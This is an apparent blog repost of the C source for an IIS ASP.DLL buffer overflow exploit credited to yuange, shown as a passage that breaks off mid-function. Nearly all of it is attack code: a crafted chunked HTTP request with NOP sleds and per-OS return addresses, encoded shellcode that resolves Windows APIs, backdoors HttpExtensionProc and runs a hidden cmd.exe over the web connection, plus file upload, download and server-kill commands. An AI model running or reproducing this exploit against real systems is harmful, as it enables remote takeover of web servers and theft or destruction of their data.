CSDN博客

img uuty

袁哥在nsfocus帖的代码aspcode,后来删了

发表于2004/10/15 10:23:00  1664人阅读

分类: 文章 程序

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma  comment(lib,"ws2_32")
//#define  RETEIPADDR  eipwin2000
#define  FNENDLONG   0x08
#define  NOPCODE     0x90
#define  NOPLONG     0x50
#define  BUFFSIZE    0x20000
#define  PATHLONG    0x12
#define  RETEIPADDRESS 0x468
#define  SHELLBUFFSIZE 0x800
#define  SHELLFNNUMS   14
#define  DATABASE      0x61
#define  DATAXORCODE   0x55
#define  LOCKBIGNUM    19999999
#define  LOCKBIGNUM2   13579139
#define  MCBSIZE       0x8
#define  MEMSIZE       0xb200
#define  SHELLPORT   0x1f90   //0x1f90=8080
#define  WEBPORT     80
void     shellcodefnlock();
void     shellcodefnlock2();
void     shellcodefn(char *ecb);
void     shellcodefn2(char *ecb);
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void     iisput(int fd,char *str);
void     iisget(int fd,char *str);
void     iiscmd(int fd,char *str);
void     iisreset();
void     iisdie();
void     iishelp();
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
  int xordatabegin;
  int  lockintvar1,lockintvar2;
  char lockcharvar;
int main(int argc, char **argv)
{
  char *server;
  char *str="LoadLibraryA""/x0""CreatePipe""/x0"
       "CreateProcessA""/x0""CloseHandle""/x0"
       "PeekNamedPipe""/x0"
       "ReadFile""/x0""WriteFile""/x0"
       "CreateFileA""/x0"
       "GetFileSize""/x0"
       "GetLastError""/x0"
       "Sleep""/x0"
       "/x09""ntdll.dll""/x0""RtlEnterCriticalSection""/x0"
       "/x09""asp.dll""/x0""HttpExtensionProc""/x0"
       "/x09""msvcrt.dll""/x0""memcpy""/x0""/x0"
       "cmd.exe""/x0""/x0d/x0a""exit""/x0d/x0a""/x0"
       "XORDATA""/x0""xordatareset""/x0"
       "strend";
//  char buff0[]="TRACK / HTTP/1.1/nHOST:";
  char buff1[]="GET /";
  char buff2[]="default.asp";
  char *buff2add;
  char buff3[]="?!!ko ";
  char buff4[]=" HTTP/1.1 /nHOST:";
  char buff5[]="/nContent-Type: application/x-www-form-urlencoded";
  char buff51[]="/nTransfer-Encoding:chunked";
  char buff6[]="/nContent-length: 2147506431/r/n/r/n";  // 0x80000000+MEMSIZ
E-1
  char buff61[]="/nContent-length: 4294967295/r/n/r/n";  // 0xffffffff
  char buff7[]= "/x10/x00/x01/x02/x03/x04/x05/x06/x1c/xf0/xfd/x7f/x20/x21/x0
0/x01";
  char buff11[]= "/x02/x00/x01/x02/x03/x04/x05/x06/x22/x22/x00/x01/x22/x22/x
00/x01";
  char buff10[]="/x20/x21/x00/x01/x20/x21/x00/x01";
  char buff9[]= "/x20/x21/x26/x27/x28/x29/x2a/x2b/x2c/x2d/x2e/x2f/x30";
  char buff8[]= "/x81/xec/xff/xe4/x90/x90/x90/x90/x90/x90/x90/x90/x90";
  /*
  char buff10[]="/x10/x00/x01/x02/x03/x04/x05/x06/x1d/x21/x00/x01/xec/x21/x0
0/x01";
  char buff11[]="/x10/x00/x01/x02/x03/x04/x05/x06/x20/x21/x00/x01/x01/x21/x0
0/x01";
  char buff12[]="/x10/x00/x01/x02/x03/x04/x05/x06/x21/x21/x00/x01/x00/x21/x0
0/x01";
  char buff13[]="/x10/x00/x01/x02/x03/x04/x05/x06/x22/x21/x00/x01/xff/x21/x0
0/x01";
  char buff14[]="/x10/x00/x01/x02/x03/x04/x05/x06/x23/x21/x00/x01/xe4/x21/x0
0/x01";
  char buff15[]="/x10/x00/x01/x02/x03/x04/x05/x06/x24/x21/x00/x01/x90/x21/x0
0/x01";
*/
  char *fnendstr="/x90/x90/x90/x90/x90/x90/x90/x90/x90";
  char SRLF[]="/x0d/x0a/x00/x00";
  char  *eipexceptwin2000add;
        char  eipexceptwin20002[]="/x80/x70/x9f/x74";   //  push ebx ; ret 
address
        char  eipexceptwin2000cn[]="/x73/x67/xfa/x7F";   //  push ebx ; ret
address
        char  eipexceptwin2000[]="/x80/x70/x97/x74";
//     char  eipexceptwin2000[]="/xb3/x9d/xfa/x77";  // /x01/x78";   //  cal
l ebx  address
        char  eipexceptwin2000msvcrt[]="/xD3/xCB/x01/x78";
        char  eipexceptwin2000sp2[]="/x02/xbc/x01/x78";
//     char  eipexceptwin2000[]="/x0B/x08/x5A/x68";
//  char  eipexceptwin2000[]="/x32/x8d/x9f/x74";
    char  eipexceptwinnt[]  ="/x82/x01/xfc/x7F";     //  push esi ; ret  add
ress
//     char  eipexceptwinnt[]  ="/x2e/x01/x01/x78";     //  call  esi  addre
ss
//  char  eipexcept2[]="/xd0/xae/xdc/x77";  //
  char    buff[BUFFSIZE];
  char    recvbuff[BUFFSIZE];
  char    shellcodebuff[BUFFSIZE];
  char    shellcodebuff2[BUFFSIZE];
  struct  sockaddr_in s_in2,s_in3;
  struct  hostent *he;
  char    *shellcodefnadd,*chkespadd;
  unsigned  int sendpacketlong,buff2long,shelladd,packlong;
  int i,j,k,l,strheadlong;
  unsigned  char temp;
  int     fd;
  u_short port,port1,shellcodeport;
  SOCKET  d_ip;
  WSADATA wsaData;
  int offset=0;
  int OVERADD=RETEIPADDRESS;
  int result;
  fprintf(stderr,"/n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
  fprintf(stderr,"/n copy by yuange 2002.4.24.");
  fprintf(stderr,"/n welcome to my homepage http://yuange.yeah.net.");
  fprintf(stderr,"/n welcome to http://www.nsfocus.com.");
  fprintf(stderr,"/n usage: %s <server> [aspfile] [webport] [winxp] /n", arg
v[0]);
  buff2add=buff2;
  if(argc <2){
      fprintf(stderr,"/n please enter the web server:");
      gets(recvbuff);
      for(i=0;i<strlen(recvbuff);++i){
         if(recvbuff[i]!=' ') break;
      }
      server=recvbuff;
      if(i<strlen(recvbuff)) server+=i;
      fprintf(stderr,"/n please enter the .asp filename:");
      gets(shellcodebuff);
      for(i=0;i<strlen(shellcodebuff);++i){
          if(shellcodebuff[i]!=' ') break;
      }
      buff2add=shellcodebuff+i;
      printf("/n .asp file name:%s/n",buff2add);
  }
  eipexceptwin2000add=eipexceptwin2000;
// printf("/n argc%d argv%s",argc,argv[5]);
  if(argc>5){
      if(strcmp(argv[5],"cn")==0) {
          eipexceptwin2000add=eipexceptwin2000cn;
          printf("/n For the cn system./n");
      }
      if(strcmp(argv[5],"sp0")==0) {
          eipexceptwin2000add=eipexceptwin20002;
          printf("/n For the sp0 system./n");
      }
      if(strcmp(argv[5],"msvcrt")==0) {
          eipexceptwin2000add=eipexceptwin2000msvcrt;
          printf("/n Use msvcrt.dll JMP to shell./n");
      }
      if(strcmp(argv[5],"sp2")==0) {
          eipexceptwin2000add=eipexceptwin2000sp2;
          printf("/n Use sp2 msvcrt.dll JMP to shell./n");
      }
  }
  result= WSAStartup(MAKEWORD(1, 1), &wsaData);
  if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
            "to the Internet at the time that "
            "this program was launched, or you "
            "do not have a 32-bit "
            "connection to the Internet.");
        exit(1);
    }
/*
  if(argc>4){
    offset=atoi(argv[4]);
  }
//  OVERADD+=offset;
//  packlong=0x10000-offset+0x8;
  if(offset<-0x20||offset>0x20){
     fprintf(stderr,"/n offset error !offset  -32 --- +32 .");
     gets(buff);
     exit(1);
  }
*/
  if(argc <2){
  //     WSACleanup( );
//       exit(1);
  }
  else  server = argv[1];
  for(i=0;i<strlen(server);++i){
     if(server[i]!=' ')
     break;
  }
  if(i<strlen(server)) server+=i;
  for(i=0;i+3<strlen(server);++i){
      if(server[i]==':'){
          if(server[i+1]=='//'||server[i+1]=='/'){
              if(server[i+2]=='//'||server[i+2]=='/'){
                  server+=i;
                  server+=3;
                  break;
              }
          }
      }
  }
  for(i=1;i<=strlen(server);++i){
      if(server[i-1]=='//'||server[i-1]=='/') server[i-1]=0;
  }
  d_ip = inet_addr(server);
  if(d_ip==-1){
     he = gethostbyname(server);
     if(!he)
     {
       WSACleanup( );
       printf("/n Can't get the ip of %s !/n",server);
       gets(buff);
       exit(1);
     }
     else    memcpy(&d_ip, he->h_addr, 4);
  }
  if(argc>3) port=atoi(argv[3]);
  else   port=WEBPORT;
  if(port==0) port=WEBPORT;
  fd = socket(AF_INET, SOCK_STREAM,0);
  i=8000;
  setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
  s_in3.sin_family = AF_INET;
  s_in3.sin_port = htons(port);
  s_in3.sin_addr.s_addr = d_ip;
  printf("/n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_
port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)
{
     closesocket(fd);
     WSACleanup( );
     fprintf(stderr,"/n  connect err.");
     gets(buff);
     exit(1);
}
  _asm{
         mov ESI,ESP
         cmp ESI,ESP
  }
  _chkesp();
  chkespadd=_chkesp;
  temp=*chkespadd;
  if(temp==0xe9) {
         ++chkespadd;
         i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
  }
  /*
  shellcodefnadd=shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }
  for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
*/
  memset(buff,NOPCODE,BUFFSIZE);
  /*
  strcpy(buff,buff0);
  if(argc>6) strcat(buff,argv[6]);
  else  strcat(buff,server);
  strcat(buff,"/r/n/r/n"); //Proxy_Connection: Keep-Alive/r/n");
  strcat(buff,buff1);
*/
  strcpy(buff,buff1);
  strheadlong=strlen(buff);
  OVERADD+=strheadlong-1;
if(argc>2) buff2add=argv[2];
for(;;++buff2add){
     temp=*buff2add;
     if(temp!='//'&&temp!='/') break;
}
// printf("/nfile:%s",buff2add);
buff2long=strlen(buff2add);
strcat(buff,buff2add);
// fprintf(stderr,"/n offset:%d/n",offset);
// offset+=strheadlong-strlen(buff1);
/*
for(i=0x404;i<=0x500;i+=8){
   memcpy(buff+offset+i,"/x42/x42/x42/x2d",4);  //  0x2d  sub eax,num32
   memcpy(buff+offset+i+4,eipexceptwin2000add,4);
  }
if(argc>5){
    if(strcmp(argv[5],"sp2")==0) {
      memcpy(buff+offset+i,"/x58",1);
    }
}
for(i=0x220;i<=0x380;i+=8){
   memcpy(buff+offset+i,"/x42/x42/x42/x2d",4);  //  0x2d  sub eax,num32
   memcpy(buff+offset+i+4,eipexceptwinnt,4);
  }
for(i=0x580;i<=0x728;i+=8){
   memcpy(buff+offset+i,"/x42/x42/x42/x2d",4);  //  0x2d  sub eax,num32
   memcpy(buff+offset+i+4,eipexceptwinnt,4);
  }
*/
// winnt 0x2cc or 0x71c  win2000 0x130 or 0x468
//  memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
shellcodefnadd=shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }
for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
  memset(shellcodebuff2,NOPCODE,BUFFSIZE);
  i=0x1000;
  memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);
  shellcodefnadd=shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
          ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }
  for(k=0;k<=BUFFSIZE;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
//  k+=0x
  memcpy(shellcodebuff,shellcodefnadd,k);   //j);
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  for(j=0;j<0x400;++j){
      if(memcmp(str+j,"strend",6)==0) break;
  }
  memcpy(shellcodebuff+k,str,j);
  sendpacketlong=k+j;
  for(k=0;k<=0x200;++k){
         if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
  }
for(j=0;j<sendpacketlong;++j){
         temp=shellcodebuff[j];
//         temp^=DATAXORCODE;
         shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
         ++k;
         shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
         ++k;
}
j=i+k;
j=j%8+3;
shellcodebuff2[i+j+k]=0;
// j=strlen(shellcodebuff2)%8+3;
for(j=0;j<=0xe000;j+=4){
   strcat(shellcodebuff2,"/x41/x41/x41/x41");  //  0x2d  sub eax,num32
//   strcat(shellcodebuff2,eipexceptwin2000cn);
  }
/*
strcat(shellcodebuff2,"/x90/x90/x90/x90/x90/x90/x90/x90/xeb/x0f/x66/x83/x6c/
x24/x02/x01/x66/x81/x2c/x24/x01/x01/xff/x24/x24/xe8/xec/xff/xff/xff/x90");
for(j=0;j<=0xb00;j+=4){
   strcat(shellcodebuff2,"/x90/x90/x90/x2d");  //  0x2d  sub eax,num32
}
*/
// printf("/nbuff:%s",buff);
printf("/n shellcode long 0x%x/n",sendpacketlong);
if(argc>4&&strcmp(argv[4],"apache")==0){
       strcat(buff," ");
}
else  strcat(buff,buff3);
printf("/n packetlong:0x%x/n",sendpacketlong);
strcat(buff,buff4);
if(argc>6) strcat(buff,argv[6]);
else  strcat(buff,server);
strcat(buff,buff5);
if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
else  strcat(buff,shellcodebuff2);
// strcat(buff,buff51);
if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
     printf("/n for %s system/n",argv[4]);
     strcat(buff,buff61);
}
else strcat(buff,buff6);
// printf("/n send buff:/n%s",buff);
/*
i=strlen(buff);
memset(buff+i,'a',0xc000);
memset(buff+i+0xc000-strlen(buff7),0,1);
strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
*/
// strcpy(buff8,buff7);
/* temp=buff7[5];
temp-=offset*0x10;
buff7[5]=temp;
i=*(int *)(buff7+4)+2;
printf("/nSEH=0x%x/n",i);
*/
/*
for(i=0;i<8;++i){
  temp=buff7[i];
  printf("%2x",temp);
}
*/
/*
for(i=0;i<0xc000/0x10;++i){
   strcat(buff,buff7);
}
*/
// printf("/nbuff=%s/n",buff);
// strcat(buff,"/r/n");
// printf("/n send buff:/n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
  sendpacketlong=strlen(buff);
//  printf("buff:/n%s",buff+0x10000);
/*
#ifdef DEBUG
  _asm{
      lea esp,buff
        add esp,OVERADD
      ret
  }
#endif
*/
  lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  lockintvar2=lockintvar1;
  xordatabegin=0;
  for(i=0;i<1;++i){
     j=sendpacketlong;
//     buff[0x2000]=0;
     fprintf(stderr,"/n send  packet %d bytes.",j);
//     gets(buff);
     send(fd,buff,j,0);
     buff7[0]=MCBSIZE;
     j=MEMSIZE+0x10;
     i=0;
     if(argc>4&&strcmp(argv[4],"winxp")==0)
     {
           j=0x18;
         i=8;
     }
     for(k=0;i<0xc000;i+=0x10){
         if(i>=j) {
               k=((i-j)/(MCBSIZE*8));
               if(k<=6){
                   memcpy(buff7+0x8,buff10,8);
                   buff7[0x8]=buff8[k];
                   buff7[0xc]=buff9[k];
               }
               else memcpy(buff7,buff11,0x10);
         }
         memcpy(buff+i,buff7,0x10);
     }
     if(argc>4&&strcmp(argv[4],"apache")==0){
         for(k=0xb000;k<=0xc000;k+=2)
         {
             memset(buff+k,0x0d,1);
             memset(buff+k+1,0x0a,1);
         }
         buff[0xc000]=0;
    //     for(k=0;k<0x10;++k)      send(fd,buff,0xc000,0);
    //     printf("/nbuff:%s/n",buff);
     }
     else send(fd,buff,0xc000,0);
      k=0;
      ioctlsocket(fd, FIONBIO, &k);
     j=0;
     while(j==0){
         k=newrecv(fd,recvbuff,BUFFSIZE,0);
         if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
            xordatabegin=1;
            fprintf(stderr,"/n ok!recv %d bytes/n",k);
            recvbuff[k]=0;
//            printf("/n recv:%s",recvbuff);
//            for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x/n",*(int *)(re
cvbuff+8+4*j));
            k=-1;
            j=1;
         }
         if(k>0){
             recvbuff[k]=0;
            fprintf(stderr,"/n  recv:/n %s",recvbuff);
         }
     }
  }
  k=1;
  ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"/n now begin: /n");
/*
  for(i=0;i<strlen(SRLF);++i){
          SRLF[i]^=DATAXORCODE;
  }
  send(fd,SRLF,strlen(SRLF),0);
  send(fd,SRLF,strlen(SRLF),0);
  send(fd,SRLF,strlen(SRLF),0);
*/
  k=1;
  l=0;
  while(k!=0){
      if(k<0){
          l=0;
          i=0;
          while(i==0){
              gets(buff);
              if(memcmp(buff,"iish",4)==0){
                       iishelp();
                     i=2;
              }
              if(memcmp(buff,"iisput",6)==0){
                       iisput(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iisget",6)==0){
                       iisget(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iiscmd",6)==0){
                     iiscmd(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iisreset",8)==0){
                     iisreset(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iisdie",6)==0){
                     iisdie(fd,buff+6);
                     i=2;
              }
              if(i==2)i=0;
              else i=1;
          }
          k=strlen(buff);
          memcpy(buff+k,SRLF,3);
    //      send(fd,SRLF,strlen(SRLF),0);
    //      fprintf(stderr,"%s",buff);
/*
          for(i=0;i<k+2;++i){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
//              buff[i]^=DATAXORCODE;
          }
             send(fd,buff,k+2,0);
*/
          newsend(fd,buff,k+2,0);
//          send(fd,SRLF,strlen(SRLF),0);
      }
      k=newrecv(fd,buff,BUFFSIZE,0);
      if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
          xordatabegin=1;
          k=-1;
      }
      if(k>0){
//          fprintf(stderr,"recv %d bytes",k);
/*
          if(xordatabegin==1){
              for(i=0;i<k;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
          }
*/
          l=0;
          buff[k]=0;
          fprintf(stderr,"%s",buff);
      }
      else{
          Sleep(20);
          if(l<20) k=1;
          ++l;
      }
//      if(k==0) break;
  }
  closesocket(fd);
  WSACleanup( );
  fprintf(stderr,"/n the server close connect.");
  gets(buff);
  return(0);
}
void  shellcodefnlock()
{
       _asm{
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              jmp   next1
getediadd:      pop   edi
                 mov   esp,edi
              and   esp,0xfffff0f0
              jmp   next2
getshelladd:
              push  0x01
              mov   eax,edi
              inc   eax
              inc   eax
              inc   eax
              inc   eax
              inc   eax
              mov   edi,eax
              mov   esi,edi
    //          sub   sp,8
              xor   ecx,ecx
looplock:     lodsb
              cmp  al,cl
              jz   shell
              sub  al,DATABASE
              mov  ah,al
              lodsb
              sub  al,DATABASE
              shl  ah,4
              add  al,ah
    //          lea  eax,ptr word [edx*4+al]
              stosb
              jmp looplock
next1:        call  getediadd
next2:        call  getshelladd
shell:
              NOP
              NOP
              NOP
              NOP
              NOP
              NOP
              NOP
              NOP
    }
}
void shellcodefn(char *ecb)
{    char        Buff[SHELLBUFFSIZE+2];
    int         *except[3];
    FARPROC     memcpyadd;
    FARPROC     msvcrtdlladd;
    FARPROC     HttpExtensionProcadd;
    FARPROC     Aspdlladd;
    FARPROC     RtlEnterCriticalSectionadd;
    FARPROC     Ntdlladd;
    FARPROC     Sleepadd;
    FARPROC     GetLastErroradd;
    FARPROC     GetFileSizeadd;
    FARPROC     CreateFileAadd;
    FARPROC     WriteFileadd;
    FARPROC     ReadFileadd;
    FARPROC     PeekNamedPipeadd;
    FARPROC     CloseHandleadd;
    FARPROC     CreateProcessadd;
    FARPROC     CreatePipeadd;
    FARPROC        procloadlib;
    FARPROC     apifnadd[1];
    FARPROC     procgetadd=0;
    FARPROC     writeclient;
    FARPROC     readclient;
       HCONN       ConnID;
    FARPROC     shellcodefnadd=ecb;
    char        *stradd,*stradd2,*dooradd;
    int         imgbase,fnbase,i,k,l,thedoor;
    HANDLE      libhandle;
    int         fpt;   //libwsock32;
    STARTUPINFO siinfo;
    PROCESS_INFORMATION ProcessInformation;
    HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
    int         lBytesRead;
    int  lockintvar1,lockintvar2;
    char lockcharvar;
    int  shelllocknum;
//    unsigned char temp;
    SECURITY_ATTRIBUTES sa;
    _asm {            jmp    nextcall
         getstradd:   pop    stradd
                      lea    EDI,except
                      mov    eax,dword ptr FS:[0]
                      mov    dword ptr [edi+0x08],eax
                      mov    dword ptr FS:[0],EDI
    }
       except[0]=0xffffffff;
       except[1]=stradd-0x07;
       imgbase=0x77e00000;
       _asm{
          call getexceptretadd
       }
       for(;imgbase<0xbffa0000,procgetadd==0;){
            imgbase+=0x10000;
            if(imgbase==0x78000000) imgbase=0xbff00000;
            if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+
0x3c))=='EP'){
                   fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgb
ase;
                   k=*(int *)(fnbase+0xc)+imgbase;
                   if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
                      libhandle=imgbase;
                      k=imgbase+*(int *)(fnbase+0x20);
                      for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
                        if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+i
mgbase+*(int *)k)=='Acor')
                        {
                           k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
                           k+=*(int *)(fnbase+0x10)-1;
                           k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c))
;
                           procgetadd=k+imgbase;
                           break;
                        }
                      }
                   }
            }
          }
//搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
//注意这儿处理了搜索页面不在情况。
    if(procgetadd==0) goto  die ;
    i=stradd;
           for(k=1;*stradd!=0;++k) {
                if(*stradd==0x9) libhandle=procloadlib(stradd+1);
                else     apifnadd[k]=procgetadd(libhandle,stradd);
                for(;*stradd!=0;++stradd){
                }
                ++stradd;
           }
           ++stradd;
           k=0x7ffdf020;
           *(int *)k=RtlEnterCriticalSectionadd;
    k=stradd;
    stradd=i;
    thedoor=0;
    i=0;
    _asm{
                   jmp  getdoorcall
getdooradd:     pop  dooradd;
                mov  l,esp
                call getexceptretadd
    }
    if(i==0){
        ++i;
        if(*(int *)ecb==0x90){
            if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
                i=0;
                thedoor=1;
            }
        }
    }
    if(i!=0){
       *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
       *(int *)(dooradd-0x13)=shellcodefnadd;
      ecb=0;
      _asm{
          call getexceptretadd
      }
      i=ecb;
      i&=0xfffff000;
      ecb=i;
      ecb+=0x1000;
      for(;i<l;++i,++ecb)
      {
            if(*(int *)ecb==0x90){
                if(*(int *)(ecb+8)==(int *)ecb){
                    if(*(int *)*(int *)(ecb+0x64)=='ok!!')    break;
                }
            }
      }
      i=0;
      _asm{
          call getexceptretadd
      }
      i&=0xfffff000;
      i+=0x1000;
      for(;i<l;++i){
          if(*(int *)i==HttpExtensionProcadd){
            *(int *)i=dooradd-7;
           //    break;
         }
      }
  //    *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
    }
    writeclient= *(int *)(ecb+0x84);
    readclient = *(int *)(ecb+0x88);
    ConnID     = *(int *)(ecb+8) ;
    stradd=k;
       _asm{
           lea edi,except
           mov eax,dword ptr [edi+0x08]
           mov dword ptr fs:[0],eax
       }
       if(thedoor==0){
           _asm{
                mov eax,0xffffffff
                mov dword ptr fs:[0],eax
           }
       }
            stradd2=stradd;
            stradd+=8;
            k=0x20;
            writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
            k=8;
            writeclient(ConnID,stradd+9,&k,0);
//            Sleepadd(100);
            shelllocknum=LOCKBIGNUM2;
            if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int *)(ecb+0x6
4)+4)=='notx') shelllocknum=0;
// iiscmd:
            lockintvar1=shelllocknum%LOCKBIGNUM;
            lockintvar2=lockintvar1;
iiscmd:
/*
            lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
            lockintvar2=lockintvar1;
*/
            sa.nLength=12;
            sa.lpSecurityDescriptor=0;
            sa.bInheritHandle=TRUE;
            CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
            CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
            _asm{
                lea EDI,siinfo
                xor eax,eax
                mov ecx,0x11
                repnz stosd
            }
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;
    k=0;
//    while(k==0)
//   {
        k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo,&Pro
cessInformation);
//        stradd+=8;
//    }
        Sleepadd(200);
//        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
    i=0;
    while(1) {
        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
        if(lBytesRead>0) {
           i=0;
           ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
           if(lBytesRead>0) {
               for(k=0;k<lBytesRead;++k){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                Buff[k]^=lockcharvar;   // DATAXORCODE;
//                Buff[k]^=DATAXORCODE;
               }
               writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
//               Sleepadd(20);
           }
        }
        else{
//                 Sleepadd(10);
             l=0;
             if(i<50){
                 l=1;
                 ++i;
                 k=1;
                 lBytesRead=0;
             }
              while(l==0){
                 i=0;
                 lBytesRead=SHELLBUFFSIZE;
                 k=readclient(ConnID,Buff,&lBytesRead);
                  for(l=0;l<lBytesRead;++l){
                         lockintvar1=lockintvar1*0x100;
                         lockintvar1=lockintvar1%LOCKBIGNUM;
                         lockcharvar=lockintvar1%0x100;
                         Buff[l]^=lockcharvar;   // DATAXORCODE;
                  }
                  if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2
]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
                      k=8;
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      stradd2=Buff+5;
                      Buff[lBytesRead]=0;
                      goto iiscmd;
                  }
                  if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2
]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){
                        lBytesRead=0x0c;
                        writeclient(ConnID,stradd+0x11,&lBytesRead,0);
                           lockintvar1=shelllocknum%LOCKBIGNUM;
                        lockintvar2=lockintvar1;
                        lBytesRead=0;
                  }
                  if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2
]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
                      k=8;
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      *(int *)(dooradd-0x0c)=0;
                      Sleepadd(0x7fffffff);
                      _asm{
                          mov eax,0
                          mov esp,0
                          jmp eax
                      }
                  }
                 if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=
='t'&&Buff[3]==' ')
                 {
                    l=*(int *)(Buff+4);
    //                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
                    fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENE
RIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                    k=GetLastErroradd();
                    i=0;
                    while(l>0){
                       lBytesRead=SHELLBUFFSIZE;
                       k=readclient(ConnID,Buff,&lBytesRead);
                       if(k==1){
                           if(lBytesRead>0){
                               for(k=0;k<lBytesRead;++k){
                                     lockintvar1=lockintvar1*0x100;
                                     lockintvar1=lockintvar1%LOCKBIGNUM;
                                     lockcharvar=lockintvar1%0x100;
                                     Buff[k]^=lockcharvar;   // DATAXORCODE;

                               }
                             l-=lBytesRead;
                        //     if(fpt>0)
                                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRea
d,NULL);
//                             else Sleepadd(010);
                           }
//                           if(i>100) l=0;
                       }
                       else {
                           Sleepadd(0100);
                           ++i;
                       }
                       if(i>10000) l=0;
                    }
                    CloseHandleadd(fpt);
                    l=0;
                 }
                 else{
                     if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff
[2]=='t'&&Buff[3]==' '){
